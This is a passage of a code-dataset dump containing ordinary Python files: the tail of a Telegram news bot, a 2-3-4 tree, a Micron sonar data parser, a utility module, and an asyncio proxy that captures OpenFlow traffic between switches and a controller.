Нажмите на него, чтобы скачать.')\n\n\nasync def news_every_10_minute():\n while True:\n fresh_news = check_news_update()\n fresh_anns = check_ann_update()\n\n if len(fresh_news) >= 1:\n for k, v in sorted(fresh_news.items()):\n image = types.input_file.InputFile.from_url(v['article_img'])\n news = f\"🔥{hbold(v['article_title'])}🔥\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['article_url'])}🎓\"\n await bot.send_photo(user_id, image, news)\n\n if len(fresh_anns) >= 1:\n for k, v in sorted(fresh_anns.items()):\n ann = f\"{hbold(v['ann_title'])}\\n\\n\" \\\n f\"{hbold('Дата: ' + v['ann_date'])}\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['ann_url'])}🎓\"\n await bot.send_message(user_id, ann)\n\n await asyncio.sleep(600)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.create_task(news_every_10_minute())\n executor.start_polling(dp)\n","repo_name":"EvgeniiPlus/tgBot_GrOIRO","sub_path":"tgBot.py","file_name":"tgBot.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31628322641","text":"# -*- coding=utf-8 -*-\n\nclass Node(object):\n\n def __init__(self):\n self.ORDER = 4\n self.numItems = 0\n self.items = [None]*(self.ORDER - 1) # [None,None,None] index from 0-2\n self.children = [None]*self.ORDER # [None,None,None,None] index from 0-3\n\n\n def connectChild(self, childNum, child):\n \"\"\" Connect child to this node \"\"\"\n self.children[childNum] = child\n\n if child != None:\n child.parent = self\n\n def disconnectChild(self, childNum):\n \"\"\" Disconnect child from this node, return it \"\"\"\n tempNode = self.children[childNum]\n self.children[childNum] = None\n return tempNode\n\n def getChild(self, childNum):\n \"\"\" Get child node \"\"\"\n return self.children[childNum]\n\n def isLeaf(self):\n \"\"\" Is node leaf \"\"\"\n return True if (self.children[0] == None) else False\n\n def getNumItems(self):\n \"\"\" Get number of items \"\"\"\n return self.numItems\n\n def getItem(self, index):\n \"\"\" Get item \"\"\"\n # get DataItem at index\n return self.items[index]\n\n def isFull(self):\n \"\"\" Check if items array full \"\"\"\n return True if (self.numItems == self.ORDER - 1) else False\n\n def findItem(self, key):\n \"\"\" Find item by key. 
Return index of item (within node) \"\"\"\n j = 0\n while j < self.ORDER - 1:\n # if found,\n # otherwise,\n if self.items[j] == None:\n break # return -1\n elif self.items[j] == key:\n return j\n j += 1\n return -1\n\n def insertItem(self, newItem):\n \"\"\" Insert new item \"\"\"\n self.numItems += 1\n \n for j in range(self.ORDER-2, -1, -1): # shift items\n if self.items[j] == None:\n continue\n else:\n if newItem < self.items[j]:\n self.items[j + 1] = self.items[j] # shift right bigger\n else:\n self.items[j + 1] = newItem # insert new item\n return j + 1 # return index to newItem\n\n self.items[0] = newItem\n return 0\n\n def removeItem(self):\n \"\"\" Remove item \"\"\"\n temp = self.items[self.numItems - 1]\n self.items[self.numItems - 1] = None\n self.numItems -= 1\n return temp\n\n def inorder(self):\n j = 0\n while j < self.numItems:\n if self.children[j] != None:\n yield from self.children[j].inorder()\n yield self.items[j]\n j += 1\n\n if self.children[j] != None:\n yield from self.children[j].inorder()\n\n\n def __repr__(self):\n \"\"\"Useful debugging function to produce linear tree representation.\"\"\"\n return \"{}:{}\".format(self.items, self.children)\n\nclass Tree234(object):\n\n def __init__(self, *initVals):\n self.root = Node()\n for _ in initVals:\n self.insert(_)\n\n def find(self, key):\n \"\"\" Find item \"\"\"\n curNode = self.root\n childNum = 0\n\n while True:\n childNum = curNode.findItem(key)\n if childNum != -1:\n return childNum\n elif curNode.isLeaf():\n return -1\n else:\n curNode = self.getNextChild(curNode, key)\n\n def insert(self, value):\n \"\"\" Insert new value \"\"\"\n node = self.root\n\n while True:\n if node.isFull():\n self.split(node)\n node = node.parent\n node = self.getNextChild(node, value)\n elif node.isLeaf():\n break\n else:\n node = self.getNextChild(node, value)\n\n node.insertItem(value)\n\n def split(self, thisNode):\n \"\"\" Split the node \"\"\"\n itemIndex = 0\n\n itemC = thisNode.removeItem()\n itemB = thisNode.removeItem()\n child2 = thisNode.disconnectChild(2)\n child3 = thisNode.disconnectChild(3)\n \n if thisNode == self.root:\n self.root = Node()\n parent = self.root\n self.root.connectChild(0, thisNode)\n else:\n parent = thisNode.parent\n\n itemIndex = parent.insertItem(itemB)\n j = parent.numItems - 1\n while j > itemIndex: # shift children to right for new child\n temp = parent.disconnectChild(j)\n parent.connectChild(j + 1, temp)\n j -= 1\n\n newRight = Node()\n parent.connectChild(itemIndex + 1, newRight)\n newRight.insertItem(itemC)\n newRight.connectChild(0, child2) # connect 2,3 childrens to rightNode\n newRight.connectChild(1, child3)\n\n def getNextChild(self, node, value):\n \"\"\" Get next child \"\"\"\n j = 0\n while j < node.numItems:\n if value < node.getItem(j):\n return node.getChild(j)\n j += 1\n\n return node.getChild(j)\n\n def __iter__(self):\n \"\"\"In order traversal of elements in the tree.\"\"\"\n if self.root:\n for e in self.root.inorder():\n yield e\n\n def displayTree(self):\n \"\"\" Display tree \"\"\"\n self.recDisplayTree(self.root, 0, 0)\n\n def recDisplayTree(self, node, level, childNumber):\n \"\"\" Recursevly display tree \"\"\"\n print(\"level={} child={} {}\".format(level, childNumber, node))\n\n for j in range(0, node.numItems+1):\n nextNode = node.getChild(j)\n if nextNode != None:\n self.recDisplayTree(nextNode, level + 1, j)\n else:\n return\n\n\nif __name__ == \"__main__\":\n t=Tree234(30, 50, 70, 40, 20, 80, 25, 90, 75, 10)\n #t.displayTree()\n for v in t:\n 
print(v)","repo_name":"RANUX/python-algorithms","sub_path":"4. Recursive Structures/my/tree234.py","file_name":"tree234.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1938364866","text":"# MicronEnsemble.py\n#\n# Represents a Micron Sonar ensemble.\n# 2020-03-13 zduguid@mit.edu initial implementation \n\nimport datetime\nimport dateutil\nimport math\nimport numpy as np\nimport pandas as pd \nfrom MicronSonar import MicronSonar\n\nclass MicronEnsemble(MicronSonar):\n def __init__(self, csv_row, date, bearing_bias=0, sonar_depth=None, \n sonar_altitude=None):\n \"\"\"Constructor of a Micron Sonar ensemble\n\n The Micron Sonar User Manual and Seanet DumpLog Software Manual were \n used to write this code.\n\n Args: \n csv_row: A list of strings that represent one ensemble from the\n Micron Sonar without any additional processing. The first 15\n values of the list are header variables, and then the\n remaining variables are acoustic intensity values.\n date: A tuple of integers representing (year,month,day). The date \n argument should match the date of which the data is recorded.\n bearing_bias: Optional argument to represent the bias of the \n scanning sonar in units of degrees while the data was being \n collected. The bearing bias may be due to the vehicle rolling, \n or from an error in the mounting configuration. Positive \n bearing bias corresponds with the vehicle rolling right due to \n a banking right turn and negative bearing bias corresponds \n with the vehicle rolling left due to a banking left turn.\n sonar_depth: depth in [m] of the sonar transducer head, used for \n filtering out surface reflections in the intensity bins.\n sonar_altitude: altitude in [m] of the sonar transducer head, used \n for filtering out bottom reflections in the intensity bins.\n \"\"\"\n # use the parent constructor for defining Micron Sonar variables\n super().__init__()\n\n # initialize Micron Ensemble data array based on number of variables\n self._data_array = np.zeros(self.ensemble_size)\n\n # parse header and acoustic intensities, compute derived variables \n self.set_data('sonar_depth', sonar_depth)\n self.set_data('sonar_altitude', sonar_altitude)\n self.parse_header(csv_row, date, bearing_bias)\n self.parse_intensity_bins(csv_row)\n self.parse_derived_vars()\n \n\n @property\n def data_array(self):\n return self._data_array\n \n @property\n def intensity_data(self):\n return self.data_array[self.intensity_index:]\n\n\n def get_data(self, var):\n \"\"\"Getter method for a give variable in the data array\"\"\"\n if (var not in self.label_set):\n raise ValueError(\"bad variable for: get(%s)\" % (var))\n else:\n return self.data_array[self.data_lookup[var]]\n\n\n def set_data(self, var, val, attribute=True):\n \"\"\"Setter method for a variable-value pair to be put in the array\"\"\"\n if (var not in self.label_set):\n raise ValueError(\"bad variable for: set(%s, %s)\" % (var, str(val)))\n self._data_array[self.data_lookup[var]] = val \n if attribute: setattr(self, var, val)\n\n\n def parse_header(self, csv_row, date, bearing_bias):\n \"\"\"Parses the header variables of the Micron Sonar ensemble\n\n Args: \n csv_row: a list of strings representing an ensemble of data.\n date: a tuple of (year,month,day) values\n bearing_bias: a number that represents the bias of the sonar angle \n when the data was collected. 
Positive bearing bias corresponds \n with the vehicle rolling right due to a banked right turn. \n \"\"\"\n # add header values to the data array \n for i in range(len(self.header_vars)):\n\n # handle line header parameter (does not contain numerical type)\n if (i == self.header_vars.index('line_header')): \n self.set_data('line_header', 1)\n \n # add year,month,day to DateTime object \n elif (i == self.header_vars.index('date_time')): \n (year, month, day) = date\n date_time = date_time = dateutil.parser.parse(csv_row[i])\n date_time = date_time.replace(year=year, month=month, day=day,\n microsecond=0)\n self.set_data('date_time', date_time.timestamp())\n self.set_data('year', year)\n self.set_data('month', month)\n self.set_data('day', day)\n\n # parse all other header variables (all others are numerical) \n else:\n variable = self.header_vars[i]\n value = int(csv_row[i])\n self.set_data(variable, value)\n\n # set the bearing bias to compute the bearing correctly \n self.set_data('bearing_bias', bearing_bias)\n\n # convert header values to standard metric values \n self.convert_to_metric('range_scale', self.DM_TO_M)\n self.convert_to_metric('gain', self.BIN_TO_PER)\n self.convert_to_metric('ad_low', self.BIN_TO_DB)\n self.convert_to_metric('ad_span', self.BIN_TO_DB)\n self.convert_to_metric('left_lim', self.GRAD_TO_DEG)\n self.convert_to_metric('right_lim', self.GRAD_TO_DEG)\n self.convert_to_metric('steps', self.GRAD_TO_DEG*2)\n self.convert_to_metric('bearing', self.GRAD_TO_DEG)\n\n # update coordinate system of Micron Sonar bearing \n # - includes bearing bias correction \n bearing = self.reorient_bearing(self.get_data('bearing'), bias=False)\n ref_world = self.reorient_bearing(self.get_data('bearing'), bias=True)\n left_lim = self.reorient_bearing(self.get_data('left_lim'))\n right_lim = self.reorient_bearing(self.get_data('right_lim'))\n self.set_data('bearing', bearing)\n self.set_data('bearing_ref_world', ref_world)\n self.set_data('left_lim', left_lim)\n self.set_data('right_lim', right_lim)\n\n # compute incidence angle based upon bearing after corrected \n # - incidence angle is defined as the angle deviation away from \n # the sonar pointing directly upwards to the ocean (or ice) surface\n incidence_angle = abs(self.get_data('bearing_ref_world'))\n self.set_data('incidence_angle', incidence_angle)\n\n # compute the bin size in order to parse intensity bins correctly\n self.set_data('bin_size', self.range_scale / self.dbytes)\n\n\n def parse_intensity_bins(self, csv_row):\n \"\"\"Parses acoustic intensity values and adds them to the data array\"\"\"\n # more intensity bins are received than the size of the array\n if self.dbytes > self.intensity_len:\n raise ValueError(\"bad number of bins: %d\" % (self.dbytes))\n\n # add intensity values to the data array \n for i in range(self.intensity_len):\n bin_label = 'bin_' + str(i)\n # parse the intensity value directly from the array \n if (i+1) < self.dbytes: \n bin_val = float(csv_row[i+self.header_len])\n # keep extra bins set to zero \n else:\n break\n self.set_data(bin_label, bin_val, attribute=False)\n \n # convert intensity bins from [0,255] -> [0,80dB]\n self.convert_to_metric('intensity', self.BIN_TO_DB, intensity=True)\n\n # filter out blanking distance and surface/bottom reflections \n self.filter_blanking_distance()\n self.filter_reflections()\n\n\n def parse_derived_vars(self):\n \"\"\"Computes the derived quantities for the ensemble\"\"\"\n # compute bin size, max intensity, and max intensity bin\n 
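To make the bearing convention above concrete, here is a worked example of the transform implemented in reorient_bearing below (the numbers are illustrative):

raw = 270.0       # bearing reported by the sonar, in degrees
b = -raw          # negate: -270.0
if b <= -180.0:
    b += 360.0    # wrap into (-180, 180]: 90.0
b += 5.0          # with bias=True, add e.g. a +5 deg roll bias -> 95.0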
self.set_data('max_intensity', np.max(self.intensity_data))\n self.set_data('max_intensity_bin', np.argmax(self.intensity_data))\n\n # determine the peak of the signal according to the FWHM method\n peak_start_bin, peak_end_bin = self.get_peak_width()\n peak_width_bin = peak_end_bin - peak_start_bin\n self.set_data('peak_start_bin', peak_start_bin)\n self.set_data('peak_end_bin', peak_end_bin)\n self.set_data('peak_width_bin', peak_width_bin)\n self.set_data('peak_start', peak_start_bin * self.bin_size)\n self.set_data('peak_end', peak_end_bin * self.bin_size)\n self.set_data('peak_width', peak_width_bin * self.bin_size)\n\n # compute the normalized max intensity using peak_start variable\n max_intensity_norm = self.max_intensity * self.peak_start\n self.set_data('max_intensity_norm', max_intensity_norm)\n\n # compute vertical range from slant range and bearing \n self.get_vertical_range()\n\n # set ice classifications and labels to np.nan\n # + classifications are made based on swaths not single ensembles\n # + labels are specified manually \n for ice_var in self.ice_vars:\n self.set_data(ice_var, np.nan)\n\n\n def convert_to_metric(self, variable, multiplier, attribute=True, \n intensity=False):\n \"\"\"Converts variable to standard metric value using the multiplier\"\"\"\n if not intensity:\n value = self.get_data(variable)\n self.set_data(variable, value * multiplier, attribute)\n else:\n self._data_array[self.intensity_index:] *= multiplier\n\n\n def reorient_bearing(self, bearing_deg, bias=False):\n \"\"\"Reorient bearing from Micron Sonar default to custom orientation \n\n Accounts for the bearing bias, which is passed to the constructor of \n a MicronEnsemble object. See ReadMe for more in-depth explanation \n of coordinate system.\n\n Args:\n bearing_deg: the bearing in degrees recorded by the Micron Sonar.\n bias: boolean to include the bearing bias or not in calculation \n\n Returns:\n Bearing that has been rotated and flipped into a new orientation.\n \"\"\"\n # constants \n deg_in_circle = 360\n deg_in_half = 180\n bearing_deg *= -1\n if bearing_deg <= -deg_in_half:\n bearing_deg += deg_in_circle\n\n # if given, include bearing bias term (possible due to vehicle roll)\n if bias: \n bearing_deg += self.get_data('bearing_bias')\n return bearing_deg\n\n\n def filter_blanking_distance(self):\n \"\"\"Filters out the intensity values within blanking distance\"\"\"\n blanking_dist_bin = math.ceil(self.BLANKING_DISTANCE/self.bin_size)\n self._data_array[self.intensity_index : \n self.intensity_index + blanking_dist_bin] = 0\n\n\n def filter_reflections(self):\n \"\"\"Filters out surface and bottom reflections\"\"\"\n # epsilon defined to detect when cosine is sufficiently close to zero\n cos_bear = abs(np.cos(self.bearing_ref_world * self.DEG_TO_RAD))\n\n def filter_at_dist(dist):\n \"\"\"Inner function for filtering array values\"\"\"\n bin_index = math.floor(dist/self.bin_size)\n self._data_array[self.intensity_index + bin_index:] = 0\n\n # filter-out surface reflections when depth is known\n if ((self.sonar_depth) and \n (abs(self.bearing_ref_world) < 90) and\n (cos_bear >= self.COS_EPSILON)):\n filter_at_dist(self.sonar_depth*self.REFLECTION_FACTOR/cos_bear)\n \n # filter-out bottom reflections when altitude is known\n if ((self.sonar_altitude) and \n (abs(self.bearing_ref_world) > 90) and\n (cos_bear >= self.COS_EPSILON)):\n filter_at_dist(self.sonar_altitude*self.REFLECTION_FACTOR/cos_bear)\n\n\n def get_peak_width(self):\n \"\"\"Computes the width of the dominant peak of 
the ensemble\n\n Uses the Full Width Half Maximum (FWHM) method for extracting the width\n of the main signal peak. To account for narrow peaks in ensemble \n intensity values, a rolling median filter and convolution filter \n methods are applied. \n \"\"\"\n # get width of values that satisfy the threshold \n bin_data = pd.DataFrame(self.intensity_data)\n bin_roll = bin_data.rolling(self.ROLL_MEDIAN_LEN, center=True).median()\n bin_roll = bin_roll.replace(np.nan, 0).to_numpy().flatten()\n kernel = np.ones(self.CONV_KERNEL_LEN, dtype=int)\n \n # threshold the array based on half of the maximum intensity \n bin_threshold = np.array(bin_roll)\n bin_threshold[bin_threshold < np.max(bin_roll) / 2] = 0\n bin_threshold[bin_threshold >= np.max(bin_roll) / 2] = 1\n \n # convolve the threshold array to account for narrow valleys \n bin_threshold = np.convolve(bin_threshold, kernel, mode='same')\n bin_threshold[bin_threshold > 0] = 1\n \n # separate the array into left and right sides of the maximum \n max_bin_index = int(self.max_intensity_bin)\n left_of_max = bin_threshold[ :max_bin_index]\n right_of_max = bin_threshold[max_bin_index: ]\n\n # extract the start and end peak values \n if (len(left_of_max) == 0) or (len(right_of_max) == 0):\n peak_start_bin = np.nan\n peak_end_bin = np.nan \n else:\n peak_start_bin = len(left_of_max) - np.argmax(left_of_max[::-1]==0)\n peak_end_bin = np.argmax(right_of_max==0) + max_bin_index\n \n return peak_start_bin, peak_end_bin\n\n\n def get_vertical_range(self):\n \"\"\"Computes the vertical range using slant range and bearing\"\"\"\n cos_bearing = np.cos(self.bearing_ref_world * self.DEG_TO_RAD)\n\n # compute vertical range depending on the cosine of the bearing \n if cos_bearing < 0:\n vertical_range = np.nan\n else:\n vertical_range = self.peak_start*cos_bearing\n\n # set the vertical range value \n self.set_data('vertical_range', vertical_range)\n\n","repo_name":"zduguid/sonar-ice-detect","sub_path":"MicronEnsemble.py","file_name":"MicronEnsemble.py","file_ext":"py","file_size_in_byte":14128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3544219544","text":"'''Collection of utility functions'''\nimport shell, os, glob\nfrom typesystem import *\n\ndef chopNewline(string):\n '''!Chops the trailing newline off input string.\n@param string string\n@returns string'''\n mustBeString(string)\n assert (string[-1] == \"\\n\"), string + \" doesn't end in a newline\"\n ret = string[:-1]\n return ret\n\ndef stringIsWhitespace(string):\n '''!Returns True iff input string consists only of whitespace characters.\n@param string string\n@returns bool'''\n mustBeString(string)\n s1 = string.replace(\" \", \"\")\n s2 = s1.replace(\"\\t\", \"\")\n ret = (s2 == \"\")\n return ret\n\ndef quote(string):\n '''!Returns input string enclosed in double-quotes.\n@param string string\n@returns string'''\n mustBeString(string)\n return '\"' + string + '\"'\n\ndef initialCaps(s):\n \"\"\"!Returns a copy of `s' with its first character made uppercase;\nall other characters are left alone.\n@param s string\n@returns string\"\"\"\n return s[0].upper() + s[1:]\n\ndef getAllPythonModulesFromDirectory(directory):\n '''!Returns a list of all .py files in the given directory, stripped of directory\nprefix and .py suffix (suitable for use in __init__.py files)\n@param directory string\n@returns [string, ...]'''\n mustBeString(directory)\n shell.assertFileExists(directory, \"directory\")\n modules_list = glob.glob(directory + 
\"/*.py\")\n init_file = os.path.join(directory, \"__init__.py\")\n modules_list = filter((lambda s: s != init_file), modules_list)\n module_names = [ shell.basename(module, \".py\") for module in modules_list ]\n return module_names\n\n","repo_name":"davidiw/FeS2-with-DRAMSim2","sub_path":"external/pacg/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"5514262672","text":"\"\"\"Proxy Module\n\nTodo:\n * to create reconnecting method\n * to create openflow packet obj\n * to implement filter function\n\"\"\"\nimport asyncio\nfrom datetime import datetime\nfrom logging import getLogger, Logger\n\nfrom ofproto.packet import OFMsg\n\n\nclass Channel:\n \"\"\"OpenFlow channel\"\"\"\n\n filter_func = None\n\n def __init__(self, queue, switch_handler=None, switch_writer=None, controller_handler=None, controller_writer=None):\n \"\"\"init\n\n Args:\n queue (asyncio.Queue) : queue to store packet\n switch_handler (SwitchHandler) :\n switch_writer (asyncio.StreamWriter) :\n controller_handler (ControllerHandler) :\n controller_writer (asyncio.StreamWriter) :\n \"\"\"\n self.q_all = queue\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self._switch_handler = switch_handler\n self.switch_writer = switch_writer\n self._controller_handler = controller_handler\n self.controller_writer = controller_writer\n\n def set_switch(self, switch_handler, switch_writer):\n \"\"\"set switch handler to send switch\n\n Args:\n switch_handler (SwitchHandler) :\n switch_writer (asyncio.StreamWriter) :\n \"\"\"\n self._switch_handler = switch_handler\n self.switch_writer = switch_writer\n\n def set_controller(self, controller_handler, controller_writer):\n \"\"\"set controller handler to send controller\n\n Args:\n controller_handler (ControllerHandler) :\n controller_writer (asyncio.StreamWriter) :\n \"\"\"\n self._controller_handler = controller_handler\n self.controller_writer = controller_writer\n\n def _filter(self, data, switch2controller):\n \"\"\"On Packet\n\n Args:\n data (bytes) :\n switch2controller (bool) :\n\n Returns:\n bytes\n \"\"\"\n cls = self.__class__\n if cls.filter_func:\n data = cls.filter_func(data, switch2controller)\n return data\n\n async def send_to_controller(self, data):\n \"\"\"set data and sent to controller\n\n Args:\n data (bytes) : data that is sent to controller\n\n Returns:\n int : -1 if failed to send\n \"\"\"\n if not self.is_closing():\n filtered_data = self._filter(data, switch2controller=True)\n await self._put_queue_all(filtered_data, switch2controller=True)\n await self._controller_handler.send_to_controller(self.controller_writer, filtered_data)\n self.logger.debug(\"set data and sent to controller : {}\".format(filtered_data))\n return 0\n else:\n self.logger.warning(\"Failed to send to controller : {}\".format(data))\n return -1\n\n async def send_to_switch(self, data):\n \"\"\"set data and sent to switch\n\n Args:\n data (bytes) : data that is sent to switch\n\n Returns:\n int : -1 if failed to send\n \"\"\"\n if not self.is_closing():\n filtered_data = self._filter(data, switch2controller=False)\n await self._put_queue_all(filtered_data, switch2controller=False)\n await self._switch_handler.send_to_switch(self.switch_writer, filtered_data)\n self.logger.debug(\"set data and sent to switch : {}\".format(filtered_data))\n return 0\n else:\n self.logger.warning(\"Failed to send to switch : {}\".format(data))\n return -1\n\n async def 
_put_queue_all(self, data, switch2controller):\n \"\"\"put data as message\n\n Args:\n data (bytes) : data\n switch2controller (bool) : Was the data sent from switch to controller?\n \"\"\"\n timestamp = datetime.now().timestamp()\n local_ip, local_port = self.switch_writer.get_extra_info('peername')\n remote_ip, remote_port = self.controller_writer.get_extra_info('peername')\n msg = OFMsg(timestamp, local_ip, remote_ip, local_port, remote_port, data, switch2controller)\n await self.q_all.put(msg)\n\n def is_closing(self):\n \"\"\"Is this channel closing?\n\n Returns:\n bool : Is this channel established?\n \"\"\"\n is_closing = True\n if self.switch_writer is not None and self.controller_writer is not None\\\n and self._switch_handler is not None and self._controller_handler is not None:\n is_closing = self.switch_writer.is_closing() or self.controller_writer.is_closing()\n\n if is_closing:\n self.logger.debug(\"is_closing is {}, s writer is {}, c writer is {}, s handler is {}, c handler is {},\"\n \" s writer close? {}, c writer close? {}\"\n .format(is_closing, self.switch_writer is not None, self.controller_writer is not None,\n self._switch_handler is not None, self._controller_handler is not None,\n self.switch_writer.is_closing(), self.controller_writer.is_closing()))\n return is_closing\n\n @classmethod\n def filter(cls, func):\n \"\"\"decorator\"\"\"\n def wrapper(data, switch2controller):\n data = func(data, switch2controller)\n return data\n\n cls.filter_func = wrapper\n return wrapper\n\n\nclass ChannelManager:\n \"\"\"Channel Manager\n * This has queue that holds all data and gives the queue to api_module\n * This creates new channel\n\n Attributes:\n q_all (asyncio.Queue) : all data (from switch and controller)\n logger (Logger) : logger\n has_switch_join (bool) : True if a switch has join\n has_controller_join (bool) : True if a controller has join\n controller_handler (ControllerHandler) : client communicating with controller\n \"\"\"\n\n def __init__(self, loop, controller_ip='127.0.0.1', controller_port=6633):\n \"\"\"init\n\n Args:\n loop (asyncio.AbstractEventLoop) : event loop\n controller_ip (str) : controller ip\n controller_port (int) : controller port\n \"\"\"\n self.loop = loop\n self.q_all = asyncio.Queue(loop=self.loop)\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self.has_switch_join = False\n self.has_controller_join = False\n\n self.controller_handler = ControllerHandler(controller_ip, controller_port, loop, self)\n\n async def create_channel(self, switch_handler, switch_writer):\n \"\"\"create openflow channel\n\n Args:\n switch_handler (SwitchHandler) : switch connection handler\n switch_writer (StreamWriter) : switch writer\n\n Returns:\n Channel or None : OpenFlow channel. 
If the controller cannot be connected, return None.\n \"\"\"\n try:\n channel = Channel(self.q_all)\n controller_writer = await self.controller_handler.open_connection(channel)\n if controller_writer:\n channel.set_switch(switch_handler, switch_writer)\n channel.set_controller(self.controller_handler, controller_writer)\n return channel\n else:\n self.logger.debug(\"no connectable controller\")\n return None\n except Exception as e:\n raise\n\n def get_queue_all_data(self):\n \"\"\"queue for all traffic data\n\n Returns:\n asyncio.Queue\n \"\"\"\n return self.q_all\n\n def _has_open_channel(self):\n has_open_channel = self.has_switch_join and self.has_controller_join\n return has_open_channel\n\n\nclass SwitchHandler:\n \"\"\"server communicating with switches\n\n Attributes:\n host (str) : switch ip\n port (int) : switch port\n loop (asyncio.AbstractEventLoop) : event loop\n channel_manager (ChannelManager) : channel manager\n logger (Logger) : logger\n switches (set) : switch set\n \"\"\"\n\n def __init__(self, host, port, loop, channel_manager):\n \"\"\"init SwitchHandler\n\n Args:\n host (str) : switch ip\n port (int) : switch port\n loop (asyncio.AbstractEventLoop) :\n channel_manager (ChannelManager) :\n \"\"\"\n self.host = host\n self.port = port\n self.loop = loop\n self.channel_manager = channel_manager\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self.switches = set()\n\n async def start_server(self):\n \"\"\"start server\"\"\"\n server = await asyncio.start_server(self.handle_switch, host=self.host, port=self.port)\n self.logger.info(\"Server on {}\".format(server.sockets[0].getsockname()))\n\n async with server:\n self.logger.info(\"Server serve forever {}\".format(server.sockets[0].getsockname()))\n await server.serve_forever()\n\n async def handle_switch(self, reader, writer):\n \"\"\"Accepting connections from switches\n\n This creates a channel and receives data from the switch.\n This tries to send the received data to the controller, if the connection is established.\n If the connection is not established, the data is discarded.\n\n Args:\n reader (asyncio.StreamReader) :\n writer (asyncio.StreamWriter) :\n\n Returns:\n\n \"\"\"\n peername = writer.get_extra_info('peername')\n self.logger.info(\"Client {} is connected\".format(peername))\n self.switches.add(peername)\n self.channel_manager.has_switch_join = True\n\n channel = await self.channel_manager.create_channel(self, writer)\n if channel is None:\n writer.close()\n return\n\n try:\n while True:\n self.logger.debug(\"waiting data ......\")\n # 64000 is default buffer size\n data = await reader.read(64000)\n self.logger.debug(\"read {}\".format(data))\n if not data:\n self.logger.debug(\"no data from switch read\")\n break\n if not channel.is_closing():\n await channel.send_to_controller(data)\n else:\n self.logger.debug(\"the channel is closing\")\n break\n except BrokenPipeError as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n except ConnectionResetError as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n except Exception as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n raise\n finally:\n self.logger.info(\"Close the connection and do exit processing\")\n if peername in self.switches:\n self.switches.remove(peername)\n if len(self.switches) == 0:\n self.channel_manager.has_switch_join = False\n writer.close()\n\n async def send_to_switch(self, writer, data):\n \"\"\"send data to switch if queue has data\n\n Args:\n writer (asyncio.StreamWriter) :\n data 
(bytes) : data from controller\n\n Returns:\n\n \"\"\"\n try:\n if not writer.is_closing():\n writer.write(data)\n await writer.drain()\n self.logger.debug(\"sent data to switch: {}\".format(data))\n else:\n self.logger.debug(\"channel is closed\")\n except ConnectionResetError as e:\n self.logger.info(\"Connection reset: {}\".format(str(e)))\n\n\nclass ControllerHandler:\n \"\"\"client communicating with controller\n\n Attributes:\n host (str) :\n port (int) :\n loop (asyncio.AbstractEventLoop) :\n channel_manager (ChannelManager) :\n \"\"\"\n\n def __init__(self, host, port, loop, channel_manager):\n \"\"\"init SwitchHandler\n\n Args:\n host (str) : controller ip address\n port (int) : controller listen port\n loop (asyncio.AbstractEventLoop) : event loop\n channel_manager (ChannelManager) : channel manager\n \"\"\"\n self.host = host\n self.port = port\n self.loop = loop\n self.channel_manager = channel_manager\n self.logger = getLogger(\"ofcapture.\" + __name__)\n\n self.controllers = set()\n\n async def open_connection(self, channel):\n \"\"\"try to connect to controller\n\n Args:\n channel (Channel) :\n\n Returns:\n asyncio.StreamWriter or None : if succeeded to connect, return writer, else None\n \"\"\"\n try:\n reader, writer = await asyncio.open_connection(host=self.host, port=self.port, loop=self.loop)\n asyncio.ensure_future(self.handle_controller(reader, writer, channel))\n except ConnectionRefusedError as e:\n self.logger.error(\"Failed to connect to controller : {}\".format(str(e)))\n return None\n else:\n return writer\n\n async def handle_controller(self, reader, writer, channel):\n \"\"\"handle controller connection\n\n Args:\n reader (asyncio.StreamReader) :\n writer (asyncio.StreamWriter) :\n channel (Channel) :\n \"\"\"\n peername = writer.get_extra_info('peername')\n self.logger.info(\"connected Controller {}\".format(peername))\n self.controllers.add(peername)\n self.channel_manager.has_controller_join = True\n try:\n while True:\n self.logger.debug(\"waiting data ......\")\n data = await reader.read(64000)\n self.logger.debug(\"read {}\".format(data))\n if not data:\n self.logger.debug(\"no data from controller read\")\n break\n if not channel.is_closing():\n await channel.send_to_switch(data)\n else:\n self.logger.debug(\"the channel is close\")\n if channel.controller_writer is not None:\n break\n except Exception as e:\n self.logger.error(\"Failed to read: {}\".format(str(e)))\n raise\n finally:\n self.logger.info(\"Close the connection and do exit processing\")\n if peername in self.controllers:\n self.controllers.remove(peername)\n if len(self.controllers) == 0:\n self.channel_manager.has_controller_join = False\n writer.close()\n\n async def send_to_controller(self, writer, data):\n \"\"\"send data to controller if queue has data\n\n Args:\n writer (asyncio.StreamWriter) :\n data (bytes) :\n \"\"\"\n try:\n if not writer.is_closing():\n writer.write(data)\n await writer.drain()\n self.logger.debug(\"sent data to controller: {}\".format(data))\n else:\n self.logger.debug(\"channel is closed\")\n except ConnectionResetError as e:\n self.logger.info(\"Connection reset: {}\".format(str(e)))\n except Exception as e:\n self.logger.error(\"Connection error: {}\".format(str(e)))\n raise e\n","repo_name":"shu1r0/ofcapture","sub_path":"proxy/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":15160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22556507461","text":"# !/usr/bin/env python3\n# 
